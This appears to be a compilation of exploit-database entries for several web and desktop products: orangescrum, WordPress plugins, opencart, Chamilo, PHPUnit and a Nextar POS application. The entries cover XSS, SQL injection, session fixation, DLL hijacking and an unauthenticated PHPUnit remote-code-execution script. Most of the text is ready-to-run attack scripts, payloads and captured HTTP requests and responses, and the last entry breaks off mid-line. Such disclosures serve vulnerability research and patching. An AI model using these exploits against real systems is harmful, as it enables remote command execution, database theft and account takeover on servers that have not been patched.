<pre><code># Exploit Title: WordPress Plugin Contact Form Check Tester 1.0.2 - Broken Access Control<br /># Date: 2/28/2021<br /># Author: 0xB9<br /># Software Link: https://wordpress.org/plugins/contact-fo...ck-tester/<br /># Version: 1.0.2<br /># Tested on: Windows 10<br /># CVE: CVE-2021-24247<br /><br />1. Description:<br />The plugin settings are visible to all registered users in the dashboard.<br />A registered user can leave a payload in the plugin settings.<br /><br />2. Proof of Concept:<br />- Register an account<br />- Navigate to the dashboard<br />- Go to CF7 Check Tester -> Settings<br />- Add a form<br />- Add a field to the form<br />- Put in a payload in either Field selector or Field value "><script>alert(1)</script><br />- Save<br />Anyone who visits the settings page will execute the payload.<br /><br /></code></pre>
<pre><code># Exploit Title: orangescrum 1.8.0 - 'Multiple' SQL Injection (Authenticated)<br /># Date: 28/11/2021<br /># Exploit Author: Hubert Wojciechowski<br /># Contact Author: snup.php@gmail.com<br /># Company: https://redteam.pl<br /># Vendor Homepage: https://www.orangescrum.org/<br /># Software Link: https://www.orangescrum.org/<br /># Version: 1.8.0<br /># Testeted on: Windows 10 using XAMPP, Apache/2.4.48 (Win64) OpenSSL/1.1.1l PHP/7.4.23<br /><br />### SQL Injection<br /><br /><br /># Authenticated user<br /><br />-----------------------------------------------------------------------------------------------------------------------<br /># POC<br />-----------------------------------------------------------------------------------------------------------------------<br /><br />## Example vuln parameters:<br /><br />* project_id<br />* old_project_id<br />* uuid<br />* uniqid<br />* projid<br />* id<br />* caseno<br /><br />-----------------------------------------------------------------------------------------------------------------------<br />-----------------------------------------------------------------------------------------------------------------------<br /><br />## Example<br /><br />-----------------------------------------------------------------------------------------------------------------------<br />Req old_project_id=1' - error<br />-----------------------------------------------------------------------------------------------------------------------<br /><br />POST /orangescrum/easycases/move_task_to_project HTTP/1.1<br />Origin: http://127.0.0.1<br />Content-Length: 64<br />Accept-Language: pl,en-US;q=0.7,en;q=0.3<br />Accept-Encoding: gzip, deflate<br />Sec-Fetch-Site: same-origin<br />Host: 127.0.0.1:80<br />Accept: */*<br />User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0<br />Connection: close<br />X-Requested-With: XMLHttpRequest<br />Sec-Fetch-Mode: cors<br />Cookie: language=en-gb; currency=USD; CAKEPHP=onb8uaoqhe4kst0cj5koufc781; user_uniq_agent=9c7cba4c3dd1b2f7ace2dd877a58051a25561a365a6631f0; USER_UNIQ=e0bd28cc49dc2c60c80c7488b61c2aa2; USERTYP=2; USERTZ=28; USERSUB_TYPE=0; IS_MODERATOR=0; SES_TYPE=1; SES_COMP=1; CMP_CREATED=2021-11-28+10%3A52%3A11; COMP_UID=8b0e7877a94c648807ef19006c68edf9; DEFAULT_PAGE=dashboard; LISTVIEW_TYPE=comfort; LAST_CREATED_PROJ=3; TASKGROUPBY=duedate; ALL_PROJECT=all; CURRENT_FILTER=assigntome; STATUS=2<br />Referer: http://127.0.0.1/orangescrum/dashboard<br />Content-Type: application/x-www-form-urlencoded; charset=UTF-8<br />Sec-Fetch-Dest: empty<br /><br />project_id=3&old_project_id=2'&case_id=2&case_no=1&is_multiple=0<br /><br />-----------------------------------------------------------------------------------------------------------------------<br />Res:<br />-----------------------------------------------------------------------------------------------------------------------<br /><br />HTTP/1.1 500 Internal Server Error<br />Date: Sun, 28 Nov 2021 12:42:30 GMT<br />Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40<br />X-Powered-By: PHP/5.6.40<br />Set-Cookie: USER_UNIQ=e0bd28cc49dc2c60c80c7488b61c2aa2; expires=Sun, 28-Nov-2021 14:42:30 GMT; Max-Age=7200; path=/; domain=127.0.0.1<br />Set-Cookie: USERTYP=2; expires=Sun, 28-Nov-2021 14:42:30 GMT; Max-Age=7200; path=/; domain=127.0.0.1<br />Set-Cookie: USERTZ=28; expires=Sun, 28-Nov-2021 14:42:30 GMT; Max-Age=7200; path=/; domain=127.0.0.1<br />Set-Cookie: USERSUB_TYPE=0; expires=Sun, 28-Nov-2021 14:42:30 GMT; Max-Age=7200; path=/; domain=127.0.0.1<br />Set-Cookie: SES_TYPE=1; expires=Sun, 28-Nov-2021 14:42:30 GMT; Max-Age=7200; path=/; domain=127.0.0.1<br />Set-Cookie: SES_COMP=1; expires=Sun, 28-Nov-2021 14:42:30 GMT; Max-Age=7200; path=/; domain=127.0.0.1<br />Set-Cookie: CMP_CREATED=2021-11-28+10%3A52%3A11; expires=Sun, 28-Nov-2021 14:42:30 GMT; Max-Age=7200; path=/; domain=127.0.0.1<br />Set-Cookie: COMP_UID=8b0e7877a94c648807ef19006c68edf9; expires=Sun, 28-Nov-2021 14:42:30 GMT; Max-Age=7200; path=/; domain=127.0.0.1<br />Set-Cookie: USER_UNIQ=e0bd28cc49dc2c60c80c7488b61c2aa2; expires=Sun, 28-Nov-2021 14:42:30 GMT; Max-Age=7200; path=/; domain=127.0.0.1<br />Set-Cookie: USERTYP=2; expires=Sun, 28-Nov-2021 14:42:30 GMT; Max-Age=7200; path=/; domain=127.0.0.1<br />Set-Cookie: USERTZ=28; expires=Sun, 28-Nov-2021 14:42:30 GMT; Max-Age=7200; path=/; domain=127.0.0.1<br />Set-Cookie: USERSUB_TYPE=0; expires=Sun, 28-Nov-2021 14:42:30 GMT; Max-Age=7200; path=/; domain=127.0.0.1<br />Set-Cookie: SES_TYPE=1; expires=Sun, 28-Nov-2021 14:42:30 GMT; Max-Age=7200; path=/; domain=127.0.0.1<br />Set-Cookie: SES_COMP=1; expires=Sun, 28-Nov-2021 14:42:30 GMT; Max-Age=7200; path=/; domain=127.0.0.1<br />Set-Cookie: CMP_CREATED=2021-11-28+10%3A52%3A11; expires=Sun, 28-Nov-2021 14:42:30 GMT; Max-Age=7200; path=/; domain=127.0.0.1<br />Set-Cookie: COMP_UID=8b0e7877a94c648807ef19006c68edf9; expires=Sun, 28-Nov-2021 14:42:30 GMT; Max-Age=7200; path=/; domain=127.0.0.1<br />Content-Length: 132182<br />Vary: User-Agent<br />Expires: access 12 month<br />Connection: close<br />[...]<br /><br />-----------------------------------------------------------------------------------------------------------------------<br />Req old_project_id=1'' - not error<br />-----------------------------------------------------------------------------------------------------------------------<br /><br />POST /orangescrum/easycases/move_task_to_project HTTP/1.1<br />Origin: http://127.0.0.1<br />Content-Length: 66<br />Accept-Language: pl,en-US;q=0.7,en;q=0.3<br />Accept-Encoding: gzip, deflate<br />Sec-Fetch-Site: same-origin<br />Host: 127.0.0.1:80<br />Accept: */*<br />User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0<br />Connection: close<br />X-Requested-With: XMLHttpRequest<br />Sec-Fetch-Mode: cors<br />Cookie: language=en-gb; currency=USD; CAKEPHP=onb8uaoqhe4kst0cj5koufc781; user_uniq_agent=9c7cba4c3dd1b2f7ace2dd877a58051a25561a365a6631f0; USER_UNIQ=e0bd28cc49dc2c60c80c7488b61c2aa2; USERTYP=2; USERTZ=28; USERSUB_TYPE=0; IS_MODERATOR=0; SES_TYPE=1; SES_COMP=1; CMP_CREATED=2021-11-28+10%3A52%3A11; COMP_UID=8b0e7877a94c648807ef19006c68edf9; DEFAULT_PAGE=dashboard; LISTVIEW_TYPE=comfort; LAST_CREATED_PROJ=3; TASKGROUPBY=duedate; ALL_PROJECT=all; CURRENT_FILTER=assigntome; STATUS=2<br />Referer: http://127.0.0.1/orangescrum/dashboard<br />Content-Type: application/x-www-form-urlencoded; charset=UTF-8<br />Sec-Fetch-Dest: empty<br /><br />project_id=3&old_project_id=2'';&case_id=2&case_no=1&is_multiple=0<br /><br />-----------------------------------------------------------------------------------------------------------------------<br />Res<br />-----------------------------------------------------------------------------------------------------------------------<br /><br />HTTP/1.1 200 OK<br />Date: Sun, 28 Nov 2021 12:51:23 GMT<br />Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40<br />X-Powered-By: PHP/5.6.40<br />Set-Cookie: USER_UNIQ=e0bd28cc49dc2c60c80c7488b61c2aa2; expires=Sun, 28-Nov-2021 14:51:23 GMT; Max-Age=7200; path=/; domain=127.0.0.1<br />Set-Cookie: USERTYP=2; expires=Sun, 28-Nov-2021 14:51:23 GMT; Max-Age=7200; path=/; domain=127.0.0.1<br />Set-Cookie: USERTZ=28; expires=Sun, 28-Nov-2021 14:51:23 GMT; Max-Age=7200; path=/; domain=127.0.0.1<br />Set-Cookie: USERSUB_TYPE=0; expires=Sun, 28-Nov-2021 14:51:23 GMT; Max-Age=7200; path=/; domain=127.0.0.1<br />Set-Cookie: SES_TYPE=1; expires=Sun, 28-Nov-2021 14:51:23 GMT; Max-Age=7200; path=/; domain=127.0.0.1<br />Set-Cookie: SES_COMP=1; expires=Sun, 28-Nov-2021 14:51:23 GMT; Max-Age=7200; path=/; domain=127.0.0.1<br />Set-Cookie: CMP_CREATED=2021-11-28+10%3A52%3A11; expires=Sun, 28-Nov-2021 14:51:23 GMT; Max-Age=7200; path=/; domain=127.0.0.1<br />Set-Cookie: COMP_UID=8b0e7877a94c648807ef19006c68edf9; expires=Sun, 28-Nov-2021 14:51:23 GMT; Max-Age=7200; path=/; domain=127.0.0.1<br />Vary: User-Agent<br />Expires: access 12 month<br />Content-Length: 1<br />Connection: close<br />Content-Type: text/html; charset=UTF-8<br /><br />0<br /><br /></code></pre>
<pre><code># Exploit Title: PHP Unit 4.8.28 - Remote Code Execution (RCE) (Unauthenticated)<br /># Date: 2022/01/30 <br /># Exploit Author: souzo <br /># Vendor Homepage: phpunit.de<br /># Version: 4.8.28<br /># Tested on: Unit<br /># CVE : CVE-2017-9841<br /><br />import requests<br />from sys import argv<br />phpfiles = ["/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php", "/yii/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php", "/laravel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php", "/laravel52/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php", "/lib/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php", "/zend/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php"]<br /><br />def check_vuln(site):<br /> vuln = False<br /> try:<br /> for i in phpfiles:<br /> site = site+i<br /> req = requests.get(site,headers= {<br /> "Content-Type" : "text/html",<br /> "User-Agent" : f"Mozilla/5.0 (X11; Linux x86_64; rv:95.0) Gecko/20100101 Firefox/95.0",<br /> },data="<?php echo md5(phpunit_rce); ?>")<br /> if "6dd70f16549456495373a337e6708865" in req.text:<br /> print(f"Vulnerable: {site}")<br /> return site <br /> except:<br /> return vuln<br />def help():<br /> exit(f"{argv[0]} <site>")<br /><br />def main():<br /> if len(argv) < 2:<br /> help()<br /> if not "http" in argv[1] or not ":" in argv[1] or not "/" in argv[1]:<br /> help()<br /> site = argv[1]<br /> if site.endswith("/"):<br /> site = list(site)<br /> site[len(site) -1 ] = ''<br /> site = ''.join(site)<br /><br /> pathvuln = check_vuln(site)<br /> if pathvuln == False:<br /> exit("Not vuln")<br /> try:<br /> while True:<br /> cmd = input("> ")<br /> req = requests.get(str(pathvuln),headers={<br /> "User-Agent" : f"Mozilla/5.0 (X11; Linux x86_64; rv:95.0) Gecko/20100101 Firefox/95.0",<br /> "Content-Type" : "text/html"<br /> },data=f'<?php system(\'{cmd}\') ?>')<br /> print(req.text)<br /> except Exception as ex:<br /> exit("Error: " + str(ex))<br />main()<br /> <br /></code></pre>
<pre><code># Exploit Title: orangescrum 1.8.0 - 'Multiple' Cross-Site Scripting (XSS) (Authenticated)<br /># Date: 28/11/2021<br /># Exploit Author: Hubert Wojciechowski<br /># Contact Author: snup.php@gmail.com<br /># Company: https://redteam.pl<br /># Vendor Homepage: https://www.orangescrum.org/<br /># Software Link: https://www.orangescrum.org/<br /># Version: 1.8.0<br /># Testeted on: Windows 10 using XAMPP, Apache/2.4.48 (Win64) OpenSSL/1.1.1l PHP/7.4.23<br /><br />### XSS Reflected<br /><br /><br /># Authenticated user<br /><br />-----------------------------------------------------------------------------------------------------------------------<br /># POC<br />-----------------------------------------------------------------------------------------------------------------------<br /><br />## Example XSS Reflected<br /><br />Param: projid<br />-----------------------------------------------------------------------------------------------------------------------<br />Req<br />-----------------------------------------------------------------------------------------------------------------------<br /><br />POST /orangescrum/easycases/edit_reply HTTP/1.1<br />Host: 127.0.0.1<br />User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0<br />Accept: */*<br />Accept-Language: pl,en-US;q=0.7,en;q=0.3<br />Accept-Encoding: gzip, deflate<br />Content-Type: application/x-www-form-urlencoded; charset=UTF-8<br />X-Requested-With: XMLHttpRequest<br />Content-Length: 64<br />Origin: http://127.0.0.1<br />Connection: close<br />Referer: http://127.0.0.1/orangescrum/dashboard<br />Cookie: language=en-gb; currency=USD; CAKEPHP=onb8uaoqhe4kst0cj5koufc781; user_uniq_agent=9c7cba4c3dd1b2f7ace2dd877a58051a25561a365a6631f0; USER_UNIQ=e0bd28cc49dc2c60c80c7488b61c2aa2; USERTYP=2; USERTZ=28; USERSUB_TYPE=0; IS_MODERATOR=0; SES_TYPE=1; SES_COMP=1; CMP_CREATED=2021-11-28+10%3A52%3A11; COMP_UID=8b0e7877a94c648807ef19006c68edf9; DEFAULT_PAGE=dashboard; LISTVIEW_TYPE=comfort; CURRENT_FILTER=cases<br />Sec-Fetch-Dest: empty<br />Sec-Fetch-Mode: cors<br />Sec-Fetch-Site: same-origin<br /><br />id=5&reply_flag=1&projid=1zxcvczxzxcv"><script>alert(1)</script><br /><br />-----------------------------------------------------------------------------------------------------------------------<br />Res:<br />-----------------------------------------------------------------------------------------------------------------------<br /><br />HTTP/1.1 200 OK<br />Date: Sun, 28 Nov 2021 13:28:57 GMT<br />Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40<br />X-Powered-By: PHP/5.6.40<br />Set-Cookie: USER_UNIQ=e0bd28cc49dc2c60c80c7488b61c2aa2; expires=Sun, 28-Nov-2021 15:28:57 GMT; Max-Age=7199; path=/; domain=127.0.0.1<br />Set-Cookie: USERTYP=2; expires=Sun, 28-Nov-2021 15:28:57 GMT; Max-Age=7199; path=/; domain=127.0.0.1<br />Set-Cookie: USERTZ=28; expires=Sun, 28-Nov-2021 15:28:57 GMT; Max-Age=7199; path=/; domain=127.0.0.1<br />Set-Cookie: USERSUB_TYPE=0; expires=Sun, 28-Nov-2021 15:28:57 GMT; Max-Age=7199; path=/; domain=127.0.0.1<br />Set-Cookie: SES_TYPE=1; expires=Sun, 28-Nov-2021 15:28:57 GMT; Max-Age=7199; path=/; domain=127.0.0.1<br />Set-Cookie: SES_COMP=1; expires=Sun, 28-Nov-2021 15:28:57 GMT; Max-Age=7199; path=/; domain=127.0.0.1<br />Set-Cookie: CMP_CREATED=2021-11-28+10%3A52%3A11; expires=Sun, 28-Nov-2021 15:28:57 GMT; Max-Age=7199; path=/; domain=127.0.0.1<br />Set-Cookie: COMP_UID=8b0e7877a94c648807ef19006c68edf9; expires=Sun, 28-Nov-2021 15:28:57 GMT; Max-Age=7199; path=/; domain=127.0.0.1<br />Content-Length: 1114<br />Vary: User-Agent<br />Expires: access 12 month<br />Connection: close<br />Content-Type: text/html; charset=UTF-8<br /><br /><table cellpadding="0" cellspacing="0" class="edit_rep_768 col-lg-12"><br /> <tr><br /> <td><br /> <textarea name="edit_reply_txtbox5" id="edit_reply_txtbox5" rows="3" class="reply_txt_ipad col-lg-12"><br /> xczcxz"/><b>bb</b>bbxczcxz"/>&ltxczcxz"/><b>bb</b>bb;b>bb</b>bbxczcxz"/><b>bb</b>bb </textarea><br /> </td><br /> </tr><br /> <tr><br /> <td align="right"><br /> <div id="edit_btn5" class="fr"><br /> <button type="button" value="Save" style="margin:5px;padding:3px 32px 3px 32px;" class="btn btn_blue" onclick="save_editedvalue_reply(2,5,1zxcvczxzxcv"><script>alert(1)</script>,'c64271510399996f611739b<br />[...]<br /><br /><br />## Example XSS Stored<br /><br />Example vuln paraMETERS:<br />* CS_message<br />* name<br />* data[User][email]<br /><br />-----------------------------------------------------------------------------------------------------------------------<br />Param: CS_message<br />-----------------------------------------------------------------------------------------------------------------------<br />Req<br />-----------------------------------------------------------------------------------------------------------------------<br /><br />POST /orangescrum/easycases/ajaxpostcase HTTP/1.1<br />Host: 127.0.0.1<br />User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0<br />Accept: application/json, text/javascript, */*; q=0.01<br />Accept-Language: pl,en-US;q=0.7,en;q=0.3<br />Accept-Encoding: gzip, deflate<br />Content-Type: application/x-www-form-urlencoded; charset=UTF-8<br />X-Requested-With: XMLHttpRequest<br />Content-Length: 393<br />Origin: http://127.0.0.1<br />Connection: close<br />Referer: http://127.0.0.1/orangescrum/dashboard/?project=3966c2c5cc3745d161640d07450d682c<br />Cookie: language=en-gb; currency=USD; CAKEPHP=j27a7es1lv1ln77gpngicqshe4; user_uniq_agent=9c7cba4c3dd1b2f7ace2dd877a58051a25561a365a6631f0; USER_UNIQ=e0bd28cc49dc2c60c80c7488b61c2aa2; USERTYP=2; USERTZ=28; USERSUB_TYPE=0; SES_TYPE=1; SES_COMP=1; CMP_CREATED=2021-11-28+10%3A52%3A11; COMP_UID=8b0e7877a94c648807ef19006c68edf9; DEFAULT_PAGE=dashboard; LISTVIEW_TYPE=comfort; TASKGROUPBY=duedate; CURRENT_FILTER=cases; TASK_TYPE_IN_DASHBOARD=1; LAST_CREATED_PROJ=14<br />Sec-Fetch-Dest: empty<br />Sec-Fetch-Mode: cors<br />Sec-Fetch-Site: same-origin<br /><br />pid=14&CS_project_id=8f4adc0f496a3738f04d629be909488d&CS_istype=2&CS_title=&CS_type_id=15&CS_priority=1&CS_message=zxcvbzz"/><img%20src=x%20onmouseover=alert(1)>axcbv&CS_assign_to=1&CS_due_date=&CS_milestone=&postdata=Post&pagename=dashboard&emailUser%5B%5D=1&CS_id=2678&CS_case_no=1&datatype=1&CS_legend=2&prelegend=1&hours=0&estimated_hours=0&completed=0&taskid=0&task_uid=0&editRemovedFile=<br /><br />-----------------------------------------------------------------------------------------------------------------------<br />Res:<br />-----------------------------------------------------------------------------------------------------------------------<br /><br />HTTP/1.1 200 OK<br />Date: Sun, 28 Nov 2021 13:51:29 GMT<br />Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40<br />X-Powered-By: PHP/5.6.40<br />Set-Cookie: USER_UNIQ=e0bd28cc49dc2c60c80c7488b61c2aa2; expires=Sun, 28-Nov-2021 15:51:29 GMT; Max-Age=7200; path=/; domain=127.0.0.1<br />Set-Cookie: USERTYP=2; expires=Sun, 28-Nov-2021 15:51:29 GMT; Max-Age=7200; path=/; domain=127.0.0.1<br />Set-Cookie: USERTZ=28; expires=Sun, 28-Nov-2021 15:51:29 GMT; Max-Age=7200; path=/; domain=127.0.0.1<br />Set-Cookie: USERSUB_TYPE=0; expires=Sun, 28-Nov-2021 15:51:29 GMT; Max-Age=7200; path=/; domain=127.0.0.1<br />Vary: User-Agent<br />Expires: access 12 month<br />Content-Length: 698<br />Connection: close<br />Content-Type: text/html; charset=UTF-8<br /><br />{"success":"success","pagename":"dashboard","formdata":"8f4adc0f496a3738f04d629be909488d","postParam":"Post","caseUniqId":"eb8671bf1e20702b7793b11152e9ff32","format":2,"allfiles":null,"caseNo":"1","emailTitle":"aaaaaaaaaaaaaaz\"\/><img src=x onmouseover=alert(1)>a","emailMsg":"zxcvbzz\"\/><img src=x onmouseover=alert(1)><br />[...]<br /><br /></code></pre>
<pre><code># Exploit Title: WordPress Plugin Domain Check 1.0.16 - Reflected Cross-Site Scripting (XSS) (Authenticated)<br /># Date: 30-10-2021<br /># Exploit Author: Ceylan Bozogullarindan<br /># Author Webpage: https://bozogullarindan.com<br /># Vendor Homepage: https://domaincheckplugin.com/<br /># Software Link: https://wordpress.org/plugins/domain-check/<br /># Version: 1.0.16<br /># Tested on: Linux<br /># CVE: CVE-2021-24926 (https://wpscan.com/vulnerability/8cc7cbbd-f74f-4f30-9483-573641fea733)<br /><br /><br /># Description:<br /><br />Domain Check is a Wordpress plugin that allows you to see what domains and SSL certificates are coming up for expiration and to quickly locate the coupons, coupon codes, and deals from your favorite sites before renewing.<br /><br />An authenticated user is able to inject arbitrary Javascript or HTML code to the "Domain Check Profile" interface available in settings page of the plugin, due to incorrect sanitization of user-supplied data and achieve a Reflected Cross-Site Scripting attack against the administrators. The plugin versions prior to 1.0.16 are affected by this vulnerability.<br /><br /><br />The details of the discovery are given below.<br /><br /><br /># Steps To Reproduce:<br />1. Just visit the following page after signing in the administrator panel: http://vulnerable-wordpress-website/wp-admin/admin.php?page=domain-check-profile&domain=hacked.foo<script>alert(1)</script><br />2. The XSS will be triggered on the settings page.<br /><br /></code></pre>
<pre><code># Exploit Title: opencart 3.0.3.8 - Sessjion Injection<br /># Date: 28/11/2021<br /># Exploit Author: Hubert Wojciechowski<br /># Contact Author: snup.php@gmail.com<br /># Company: https://redteam.pl<br /># Vendor Homepage: https://www.opencart.com/<br /># Software Link: https://www.opencart.com/<br /># Version: 3.0.3.8<br /># Testeted on: Windows 10 using XAMPP, Apache/2.4.48 (Win64) OpenSSL/1.1.1l PHP/7.4.23<br /><br />### Sessjion Fixation / injection<br /><br />Session cookie "OCSESSID" is inproperly processed<br />Attacker can set any value cookie and server set this value <br />Becouse of that sesssion injection and session fixation vulnerability<br /><br />-----------------------------------------------------------------------------------------------------------------------<br /># POC<br />-----------------------------------------------------------------------------------------------------------------------<br /><br />## Example<br /><br />Modify cookie "OCSESSID" value:<br />-----------------------------------------------------------------------------------------------------------------------<br />Req<br />-----------------------------------------------------------------------------------------------------------------------<br /><br />GET /opencart-3.0.3.8/index.php?route=product/category&path=20_26 HTTP/1.1<br />Host: 127.0.0.1<br />User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0<br />Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8<br />Accept-Language: pl,en-US;q=0.7,en;q=0.3<br />Accept-Encoding: gzip, deflate<br />Connection: close<br />Referer: http://127.0.0.1/opencart-3.0.3.8/<br />Cookie: language=en-gb; currency=USD; user_uniq_agent=9c7cba4c3dd1b2f7ace2dd877a58051a25561a365a6631f0; USERSUB_TYPE=0; CMP_CREATED=2021-11-28+10%3A52%3A11; COMP_UID=8b0e7877a94c648807ef19006c68edf9; DEFAULT_PAGE=mydashboard; LISTVIEW_TYPE=comfort; TASKGROUPBY=duedate; TASK_TYPE_IN_DASHBOARD=10; CURRENT_FILTER=cases; DASHBOARD_ORDER=1_1%3A%3A1%2C2%2C3%2C5%2C6%2C8%2C9; CAKEPHP=ommpvclncs2t37j8tsep486ig5; OCSESSID=zxcvzxcvzxcvzxcvzxcvzxcv<br />Upgrade-Insecure-Requests: 1<br />Sec-Fetch-Dest: document<br />Sec-Fetch-Mode: navigate<br />Sec-Fetch-Site: same-origin<br />Sec-Fetch-User: ?1<br /><br />-----------------------------------------------------------------------------------------------------------------------<br />Server set atttacker value:<br /><br />Res:<br />-----------------------------------------------------------------------------------------------------------------------<br /><br />HTTP/1.1 200 OK<br />Date: Sun, 28 Nov 2021 15:16:06 GMT<br />Server: Apache/2.4.51 (Win64) OpenSSL/1.1.1l PHP/8.0.11<br />X-Powered-By: PHP/8.0.11<br />Set-Cookie: OCSESSID=zxcvzxcvzxcvzxcvzxcvzxcv; path=/<br />Connection: close<br />Content-Type: text/html; charset=utf-8<br />Content-Length: 18944<br />[...]<br /></code></pre>
<pre><code># Exploit Title: Wordpress Plugin Download Monitor WordPress V 4.4.4 - SQL Injection (Authenticated)<br /># Date 28.01.2022<br /># Exploit Author: Ron Jost (Hacker5preme)<br /># Vendor Homepage: https://www.download-monitor.com/<br /># Software Link: https://downloads.wordpress.org/plugin/download-monitor.4.4.4.zip<br /># Version: < 4.4.5<br /># Tested on: Ubuntu 20.04<br /># CVE: CVE-2021-24786<br /># CWE: CWE-89<br /># Documentation: https://github.com/Hacker5preme/Exploits/blob/main/Wordpress/CVE-2021-24786/README.md<br /><br />'''<br />Description:<br />The Download Monitor WordPress plugin before 4.4.5 does not properly validate and escape the "orderby" GET parameter<br />before using it in a SQL statement when viewing the logs, leading to an SQL Injection issue<br />'''<br /><br /># Banner:<br />banner = '''<br /><br /> ___ __ ____ ___ ____ _ ____ _ _ _____ ___ __ <br /> / __\/\ /\/__\ |___ \ / _ \___ \/ | |___ \| || |___ ( _ ) / /_ <br /> / / \ \ / /_\_____ __) | | | |__) | |_____ __) | || |_ / // _ \| '_ \ <br />/ /___ \ V //_|_____/ __/| |_| / __/| |_____/ __/|__ _/ /| (_) | (_) |<br />\____/ \_/\__/ |_____|\___/_____|_| |_____| |_|/_/ \___/ \___/ <br /> <br /> [+] Download Monitor - SQL-Injection<br /> [@] Developed by Ron Jost (Hacker5preme)<br />'''<br />print(banner)<br /><br />import argparse<br />import requests<br />from datetime import datetime<br /><br /># User-Input:<br />my_parser = argparse.ArgumentParser(description='Wordpress Plugin RegistrationMagic - SQL Injection')<br />my_parser.add_argument('-T', '--IP', type=str)<br />my_parser.add_argument('-P', '--PORT', type=str)<br />my_parser.add_argument('-U', '--PATH', type=str)<br />my_parser.add_argument('-u', '--USERNAME', type=str)<br />my_parser.add_argument('-p', '--PASSWORD', type=str)<br />args = my_parser.parse_args()<br />target_ip = args.IP<br />target_port = args.PORT<br />wp_path = args.PATH<br />username = args.USERNAME<br />password = args.PASSWORD<br /><br />print('[*] Starting Exploit at: ' + str(datetime.now().strftime('%H:%M:%S')))<br /><br /># Authentication:<br />session = requests.Session()<br />auth_url = 'http://' + target_ip + ':' + target_port + wp_path + 'wp-login.php'<br />check = session.get(auth_url)<br /># Header:<br />header = {<br /> 'Host': target_ip,<br /> 'User-Agent': 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:89.0) Gecko/20100101 Firefox/89.0',<br /> 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8',<br /> 'Accept-Language': 'de,en-US;q=0.7,en;q=0.3',<br /> 'Accept-Encoding': 'gzip, deflate',<br /> 'Content-Type': 'application/x-www-form-urlencoded',<br /> 'Origin': 'http://' + target_ip,<br /> 'Connection': 'close',<br /> 'Upgrade-Insecure-Requests': '1'<br />}<br /><br /># Body:<br />body = {<br /> 'log': username,<br /> 'pwd': password,<br /> 'wp-submit': 'Log In',<br /> 'testcookie': '1'<br />}<br />auth = session.post(auth_url, headers=header, data=body)<br /><br /># Exploit (WORKS ONLY IF ONE LOG EXISTS)<br />print('')<br />print ('[i] If the exploit does not work, log into wp-admin and add a file and download it to create a log')<br />print('')<br /># Generate payload for SQL-Injection<br />sql_injection_code = input('[+] SQL-INJECTION COMMAND: ')<br />sql_injection_code = sql_injection_code.replace(' ', '+')<br />exploitcode_url = 'http://' + target_ip + ':' + target_port + wp_path + 'wp-admin/edit.php?post_type=dlm_download&page=download-monitor-logs&orderby=download_date`' + sql_injection_code + '`user_id'<br />exploit = session.get(exploitcode_url)<br />print(exploit)<br />print('Exploit finished at: ' + str(datetime.now().strftime('%H:%M:%S')))<br /> <br /><br /></code></pre>
<pre><code>/* <br />Description: <br />A vulnerability exists in windows that allows other applications dynamic link libraries<br />to execute malicious code without the users consent, in the privelage context of the targeted application.<br /><br />Exploit Title: Nextar C472 POS DLL Hijacking Exploit (nxmm.dll - mdmdregistration.dll)<br />Date: 28/11/2021<br />Author: Yehia Elghaly <br />Vendor: https://www.nextar.com/<br />Software: https://download.nextar.com/latest/setup_nex_en.exe<br />Version: Latest Nextar C472 POS<br />Tested on: Windows 7 Pro x86 - Windows 10 x64<br />Vulnerable extensions: .htm .html<br />*/<br /><br />/* <br />Instructions:<br /><br />1. Create dll using msfvenom (sudo msfvenom --platform windows -p windows/messagebox TEXT="Nex POS Hacked - YME" -f dll > nxmm.dll) or compile the code<br />2. Replace nxmm.dll - mdmdregistration.dll or shcore.dll in Nex directory C:\Nex with your newly dll<br />3. Launch NexAdmin.exe<br />4. PoP UP MessageBox!<br />*/<br /><br /><br />#include <windows.h><br /><br />BOOL WINAPI DllMain (HANDLE hinstDLL, DWORD fdwReason, LPVOID lpvReserved)<br />{<br /><br /> switch (fdwReason)<br /> {<br /> case DLL_PROCESS_ATTACH:<br /> dll_mll();<br /> case DLL_THREAD_ATTACH:<br /> case DLL_THREAD_DETACH:<br /> case DLL_PROCESS_DETACH:<br /> break;<br /> }<br /><br /> return TRUE;<br />}<br /><br />int dll_mll()<br />{<br /> MessageBox(0, "Nex POS Hacked!", "YME", MB_OK);<br />}<br /></code></pre>
<pre><code># Exploit Title: Chamilo LMS 1.11.14 - Account Takeover<br /># Date: July 21 2021<br /># Exploit Author: sirpedrotavares<br /># Vendor Homepage: https://chamilo.org<br /># Software Link: https://chamilo.org<br /># Version: Chamilo-lms-1.11.x<br /># Tested on: Chamilo-lms-1.11.x<br /># CVE: CVE-2021-37391<br />#Publication:<br />https://gitbook.seguranca-informatica.pt/cve-and-exploits/cves/chamilo-lms-1.11.14-xss-vulnerabilities<br /><br /><br />Description: A user without privileges in Chamilo LMS 1.11.x can send an<br />invitation message to another user, e.g., the administrator, through<br />main/social/search.php,<br />main/inc/lib/social.lib.php and steal cookies or execute arbitrary code on<br />the administration side via a stored XSS vulnerability via social network<br />the send invitation feature. .<br />CVE ID: CVE-2021-37391<br />CVSS: Medium - CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:L/A:N<br />URL:<br 